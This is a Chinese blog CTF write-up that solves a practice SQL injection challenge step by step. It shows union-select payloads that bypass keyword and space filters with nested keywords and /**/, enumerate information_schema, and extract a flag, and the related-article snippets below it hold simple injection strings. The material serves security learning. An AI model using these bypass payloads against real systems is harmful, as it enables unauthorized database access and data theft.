简单的SQL注入一

最新推荐文章于 2024-03-17 12:15:00 发布
最新推荐文章于 2024-03-17 12:15:00 发布
阅读量235 收藏
点赞数 2
分类专栏: 总结 WP 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39987853/article/details/95624845
版权
总结 同时被 2 个专栏收录
2 篇文章 0 订阅
订阅专栏
WP
2 篇文章 0 订阅
订阅专栏

**

简单的sql注入一:

**
URL:http://ctf5.shiyanbar.com/423/web/
在这里插入图片描述
上来题目给出一句话——“到底过滤了什么东西”,想到可能存在关键词过滤。
首先尝试输入1,2,3发现回显正常,输入4回显错误,说明该数据库内只有三个表单。
在这里插入图片描述在这里插入图片描述在这里插入图片描述

然后尝试输入1’,发现回显错误。根据回显信息判断参数值类型为字符型。
在这里插入图片描述
继续测试,输入’1’ or 1’=1,发现返回数据库内所有表单信息。
在这里插入图片描述
继续使用联合查询获取数据库名称,输入1’ union select database()’ ,发现报错,但是报错信息中只有database(),union和select被过滤掉了。
在这里插入图片描述
因此考虑关键词过滤的解决方案,有以下三种:
1、 大小写交替,如Order SeLect等等。
2、 双写,如orderorder selectselect等。
3、 交叉,如Selecselectt
再进行尝试,输入1’ unionselect database()’ ,发现依旧报错,但是出现union,select依旧被过滤,猜想可能过滤了空格。
在这里插入图片描述
所以利用双写的方法来绕过。输入1’ unionselectselect database()’ ,发现不行,所以尝试利用别的方式,比如加上+,%0a,%0b,//等字符,发现使用//可以成功绕过。因此输入1’ union//select//database()’ ,发现回显正确的数据库名称。
在这里插入图片描述
继续查询表名,依照上面的规则输入1’ union//select//table_name from//information_schema.tables//where//table_schema//=’web1。发现web1前面的内容被过滤了,因此猜想存在关键字过滤,可能是对table_schema进行过滤。
在这里插入图片描述
因此利用交叉法绕过过滤。输入1‘ union//select//table_name from//information_schema.tables//where//table_schtable_schemaema//=’web1,发现回显表明中含有flag。
在这里插入图片描述
紧接着查询字段名,输入1‘ union//select//column_name//from//information_schema.columns//where//table_name//=’flag。发现报错,依旧是column_name和information_schema.columns被过滤,继续使用交叉法重写。
在这里插入图片描述
输入1’ union//select//column_nacolumn_nameme//from//information_schema.coluinformation_schema.columnsmns//where//table_name//=’flag.爆出字段名。
在这里插入图片描述
最后对flag进行爆破,输入1’ union//select//flag//from//flag where/**/’1’=’1,查到内容为flag{Y0u_@r3_5O_dAmn_90Od}
在这里插入图片描述

User_unkn0wn
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入攻击实战演示(附源码)
hack0919的博客
03-31 4247
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。
SQL注入网站实例:注入步骤
老司机的后备箱
07-25 833
在第三部分,我们主要是详细的给大家演示,如何对一个网站进行SQL注入入侵的,这个入侵过程中,它是如何发现注入点的,发现和测试注入点之后,我们要如何来获得爆库、爆表、爆密码,甚至控制后台,一旦获得网站控制后台之后,更有甚者,要如何与数据库层、系统层进行交互提权,以便进一步控制数据库和操作系统,所有这些又是如何发生的我们将通过详细的注入实例,我们从中吸取教训,从安全角度来说,我们要如何来预防mysql注入的高级黑客,这就是我们第三部分所要解决的问题。
SQL注入现象_实例总结
m0_46613077的博客
05-21 1544
SQL注入——了解????? 本文主要内容:在通过使用基础的JDBC驱动连接数据库时,遇到的代码注入安全性问题。在初学的过程中大家会忽略的、值得注意的安全性问题做一个了解,同时总结学习去如何解决、避免这个基础的安全问题。 文章目录SQL注入——了解?????前言一、SQ注入过程二、如何解决SQL注入总结 前言 SQL注入主要的概念 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
03-17 3308
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQL注入简单案例
勇敢的兵
09-01 3671
文章目录什么是SQL注入使用数据库客户端工具查询用户表访问ERP系统(对密码输入框进行SQL注入SQL注入的原理解决方案重新注册一个管理员账号使用sys账号登录ERP系统(输入正确的密码)使用sys账号登录ERP系统(对密码输入框进行SQL注入UserDAO类的完整代码 什么是SQL注入 SQL注入是现在普通使用的一种攻击手段,就是通过把非法的SQL命令插入到Web表单中或页面请求查询字符串中...
Sql注入示例
我想我是海 冬天的大海 心情随风轻摆
05-19 1224
Sql注入是我们经常听说的,具体极大的风险性,下面给一个比较直观的示例:
【网络安全---sql注入(1)】你知道什么是SQL注入吗?知道如何通过SQL注入来控制目标服务器吗?一篇文章教你sql注入漏洞的原理及方法
m0_67844671的博客
09-19 955
SQL注入漏洞详解。包括原理,分类比如数字型,字符型,搜索型,xx型,宽字节注入,报错注入,盲注,有无回显等,各种注入payload以及产生原因等等
一文带你学习SQL注入
大河之犬的博客
12-21 5457
但需要注意的是,存储过程中也可能会存在注入问题,因此应该尽量避免在存储过程内使用动态的SQL语句。如果无法避免,则应该使用严格的输入过滤或者是编码函数来处理用户的输入数据。下面是一个在Java中调用存储过程的例子,其中。
sql注入实例
weixin_45901902的博客
11-11 4750
前阵子发现公司的网站有SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是Asp.net的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就通过这个实例来告诉大家SQL注入究竟有多大的危害。 初步注入--绕过验证,直接登录 公司网站登陆框如下: 可以看到除了账号密码之外,还有一个公司名的输入框,根据输入框的形式不难推出SQL的写法如下: 1 SELECT*FromTableWHEREName...
【网络安全】SQL注入_sql注入攻击实例(必学系列)
weixin_57514792的博客
03-13 1321
网络安全-SQL注入
SQL注入操作流程及实例演示+墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)
ran的博客
01-12 1643
在MYsQL5.0以上版本中,Mysql 有一个系统数据库 information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,相当于利用该表可以进行一次完整的注入,通过查询它获取指定数据库下面的表名、列名、具体数据信息。当输入了一些乱七八糟的内容之后,网页返回“404错误”或者进行了跳转,则说明本网站对输入的内容可能有检测,则说明这个网站大概率没有注入漏洞。返回的了两个数字,分别是“2”、“3”,因此,修改网址上的“2”、“3”为对应系统函数来进行信息收集。可以在参数值前加“-”;
简单sql注入1
qq_36915061的博客
12-19 662
通过sql注入得到flag 题目:http://ctf5.shiyanbar.com/423/web 打开题目: 先随便输了些数字,发现只有1、2、3查询结果 接下来进行第一步测试 输入一个带单引号的数据,目的是测试是否存在注入点,输入1’发现报错,说明此处存在注入点。且后台代码应该是一般的seletc语句,可以通过开闭合单引号来进行注入。 输入1 and 1=1发现id后显示1 1=1说明存在...
SQL的简单操作
zhang815521的博客
05-24 463
//建立数据库 CREATE DATABASE yuangong; //建立数据库表 CREATE TABLE Employees( employeesID INT, NAME VARCHAR(100), education VARCHAR(100), biethday DATE, sex INT, workyear INT , address VARCHAR(100), phonenumber ...
简单sql注入问题
12-30
sql注入问题:sql的特殊关键字与字符串拼接。会造成安全性的问题 1输入名随便,输入密码:a’ or ‘a’=’a sql:select* from user where username=‘123’ and password=‘a’ or ‘a’=‘a’ ** // 1.获取链接 ...
分享一个简单sql注入
12-16
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力...
PHP简单预防sql注入的方法
12-18
本文实例讲述了PHP简单预防sql注入的方法。分享给大家供大家参考,具体如下: 出现sql注入一般都是因为语法不规范不严谨造成的,问题出现在sql语句上,而起决定性的是quote(’)。如下: $sql = "delete from ...
php防止sql注入简单分析
12-19
防止Sql注入的方法有很多,这里要说的其实就是漏洞演练平台Dvwa里的一种方式 直接看high级别的就可以了 $id = $_GET['id']; $id = stripslashes($id); $id = mysql_real_escape_string($id); if (is_numeric($id)){...
简单sql注入1-3详解及相关阅读(实验吧)
zhy的博客
12-29 2216
题外话:更多关于信息安全、网络技术方面的东西,可以参考我的博客,也许你能找到你想看的? https://www.xiaozzz.xyz/ 1 简单Sql注入 类型:sql注入 题目链接: http://www.shiyanbar.com/ctf/1875 解题过程: 打开页面看到一个输入框和提交,先尝试输入一些简单的东西,发现输入1 2 3都是有结果的,输入4之后没有结果。 按照...
SQL注入(一)-基础
qq_47848569的博客
05-29 1528
sql注入
sql注入简单列子
05-30
假设有一个登录页面,用户需要输入用户名和密码。如果该页面没有进行输入过滤或参数...这只是一个简单的例子,实际攻击可能会更复杂和隐蔽,因此在开发过程中一定要注意输入过滤和参数化处理,避免SQL注入等安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值